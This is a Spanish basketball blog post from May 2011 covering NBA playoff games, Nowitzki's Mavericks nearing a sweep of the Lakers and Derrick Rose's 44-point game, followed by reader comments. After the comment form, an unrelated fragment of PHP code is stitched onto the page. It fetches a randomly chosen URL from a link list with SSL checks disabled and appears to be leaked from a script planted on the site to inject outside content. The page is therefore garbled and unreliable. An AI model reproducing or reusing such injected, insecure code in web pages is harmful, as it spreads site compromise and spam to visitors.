Playoffs (06/05/2011): Soltando a las fieras

07 de May de 2011 por txusma

Hoy es uno de esos días que merecen dos titulares: por un lado, los Lakers volvieron a perder y quedan a un paso de la barrida. Por el otro, Derrick Rose cuajó el mejor partido de su vida, uno de esos que no está al alcance de la mayoría de jugadores de la historia de la NBA. Permitidme que empecemos con la debacle amarilla.

Al empezar la post-temporada todos podíamos intuir que los Lakers no estaban en su mejor momento. Muchos pensaban que llegado el momento se activarían pero la realidad ha sido muy diferente. Anoche, Dallas los colocó al borde de la eliminación anotando 32 puntos en el último cuarto. Allá donde siempre reinaban Bryant y compañía ahora manda Nowitzki. El alemán destrozó una vez más a Pau Gasol y a todo aquel que se le puso por delante. Con Dirk, más el juego exterior de Stojakovic y Terry los Mavs tuvieron suficiente (92-98). 3 a 0 y los Lakers a un paso de la barrida, de una humillación inesperada. No creemos que Kobe lo permita y es posible que su casta aparezca por fin  para ganar el cuarto partido pero visto lo visto yo no descartaría nada.

Y como ya comentamos, Derrick Rose arrasó a los Hawks para dejar constancia de que su MVP es merecido y que, seguramente, no será el último. Su partido de anoche está reservado a las leyendas: 44 puntos, 7 asistencias, 5 rebotes, 16 de 27 en tiros de campo, 4 de 7 en triples y 8 de 9 en tiros libres. Le bastó con la ayuda de Taj Gibson y Kyle Korver en la anotación y Joakim Noah en la lucha bajo los aros y la intimidación. Los Hawks solo dispusieron de Jeff Teague y Josh Smith a un nivel acorde con la eliminatoria. El base está demostrando sus cualidades en el mejor escenario posible y Smith realizó un completísimo partido. Los ejecutores Johnson&Crawford no tuvieron su día y sin ellos los de Atlanta se quedan, en el mejor de los casos, en equipo muy intenso (99-82).

PREMIOS

MVP: Derrick Rose decidió dejar el mejor partido de su carrera para los Playoffs, como los grandes. No hace falta repetir los números. Por su parte, Dirk Nowitzki también está cuajando unos excepcionales Playoffs. Anoche fueron 32 puntos y 9 rebotes. Demasiado para los Lakers.

Sorpresa: Día sí y día también habrá que destacar a Jeff Teague. El base de los Hawks no deja con la boca abierta con actuaciones como la de ayer. 21 puntos, 3 rebotes y 3 asistencias.

Decepción: Es duro decirlo pero es justo remarcar que los Playoffs de Pau Gasol no están siendo nada buenos hecho que lastra casi de manera definitiva las oportunidades de los Lakers. Anoche se quedó en 12 puntos y 8 rebotes.

Esfuerzo en vano: Josh Smith cuajó unos completos 17 puntos, 13 rebotes, 4 asistencias y 4 tapones mientras que Andrew Bynum se fue a los 21 puntos y 10 rebotes. Actuaciones insuficientes para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Rompe dice:
    #1

    Tremenda la temporada del alemán, y mejorando incluso sus números en Playoffs. No ha hecho mucho ruido hasta ahora, en comparación con los sospechosos habituales. Pero qué pedazo de jugador, sin lugar a dudas al nivel de los mejores. Los porcentajes de la RS y de PO son de escándalo! Viva Dirk! (esto me suena de algo xD)

      Citar

  2. Viva_Dirk dice:
    #2

    Lo de aumentar sus números en playoffs es una costumbre muy fea que tiene este hombre 🙂 Ayer no hubo manera de pararlo y los Lakers se dejaron comer la tostada con unos últimos minutos nefastos.

    Solo un milagro les sirve a los Lakers.

      Citar

  3. HisRoyalAirness dice:
    #3

    Tengo que decir una cosa que para ver que opinais. Al margen de Pau, que está haciendo el ridìculo, lo que hace Fischer en el final de partido no es propio de un tipo con su experiencia. Permitir un tiro completamente solo y después esa falta de rookie que rompe el partido por completo y deja a Lakers sin opción de remontada. No le echo la culpa a Fisch de la derrota, sólo faltaba, pero eso es una memez

    Por lo demás, el tiro de Dirk es indefendible y no creo que haya nadie en Oklahoma capaz de pararle

      Citar

  4. Cocinitas dice:
    #4

    Alguien en Oklahoma capaz de pararle??? Creo q te olvidas de Memphis, yo no veo nada claro el pase de los Thunder si Memphis sigue con su buena defensa y con Randolph y Marc machacando por dentro.

      Citar

  5. Denise dice:
    #5

    Pues yo discrepo en algunas cosas. Yo creo que son los Lakers los que están perdiendo la eliminatoria ellos mismos en vez de los Mavs ganarla. En el primer partido, los Lakers fueron superiores, se relajaron y acabaron perdiendo más por sus propios errores que por los aciertos del rival. En el segundo, si fueron justos ganadores los Mavs, y en el de ayer, otra vez los Lakers regalaron el partido. La segunda mitad fue bastante cómoda para Lakers, casi siempre tuvieron un colchón de 6-8 puntos de ventaja sobre los Mavs, incluso tuvieron un montón de oportunidades para despegarse y superar la barrera psicológica de los 10 puntos. Incluso a 5 minutos del final, Gasol mete un canastón (de lo poco decente que hizo) que puso un 85-78 a favor de Lakers y yo ahí pensé que era la sentencia. Pero a partir de ese momento, empiezan a cagarla, dejan a los hombres de perimetro completamente solos y los Mavs le enchufan 4 triples, y ellos en ataque empiezan a seleccionar mal el tiro y acaban perdiendo.
    Con un poco más de seriedad y con Gasol como está, al 20% de su capacidad, podrían ir ganando 2-1 perfectamente, y en cambio se encuentran al borde del abismo. Yo, no veo tan buen equipo a los Mavs como mucha gente dicen, con Butler y Beaubois quizás, pero tal y como están, en ataque solo producen cuatro tíos y medio. En caso de pasar, yo creo que los Thunder o los Grizzlies se lo pueden cargar con comodidad, y ya no digamos el equipazo de los Heat, pero bueno no adelantemos el futuro y centremonos en el presente, que los Mavs no se han clasificado todavía.

      Citar

  6. HisRoyalAirness dice:
    #6

    Estoy bastante de acuerdo con Denise en lo de Lakers. Yo creo que, al margen de rendimientos individuales iban ganando cómodos y el partido se lo carga su defensa de perímetro.

    Respecto a lo de OKC, no doy por muertos a los ositos, ni mucho menos, los veo muy fuertes pero creo que ellos tampoco tienen a nadie que pueda parar a Dirk. Marc es muy lento y Zach muy bajo.

      Citar

  7. Cocinitas dice:
    #7

    Alguien sabe si hay partido en Memphis hoy??? Lo digo por lo de las inundaciones del Mississippi.

      Citar

  8. Txusma dice:
    #8

    De momento, no hay noticias de lo contrario.

    Permitidme que me desvie del tema hacia los Bulls. Rose se convierte en el 4º jugador de los Bulls en anotar más de 40 puntos en un partido tras Jordan, Ben Gordon y Flynn Robinson (este se acabe de ganar un “Quien fue…?”). Impresionante pero sin Boozer, los Bulls no tienen ninguna oportunidad frente los Heat, ahora mismo los máximos favoritos al anillo. Quien lo iba a decir!

      Citar

  9. Viva_Dirk dice:
    #9

    Bueno Txus, si me dijeras que a estas alturas los máximos candidatos al anillo son los Pacers me cuadraría lo de ‘quien lo iba a decir’, los Heat para mi estan donde deben, los Celtics no han podido con ellos de momento pero ahora toca el Garden.

    Ah!! A ver quien apostaba por los Mavs para la final de conferencia, otro pedazo de año que Nowitzki, acabe como acabe.

      Citar

  10. Txusma dice:
    #10

    Hombre, pues las apuestas de principio de temporada creo que contaba con Lakers y Celtics seguro por encima de Miami y con Orlando posiblemente a la misma altura. Miami está donde está, la sorpresa es el bajón de Lakers, Celtics y Magic…

      Citar

  11. Cocinitas dice:
    #11

    Memphis 2-1 tras prorroga, gran partido de Marc, cuanto valdrá este verano???

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>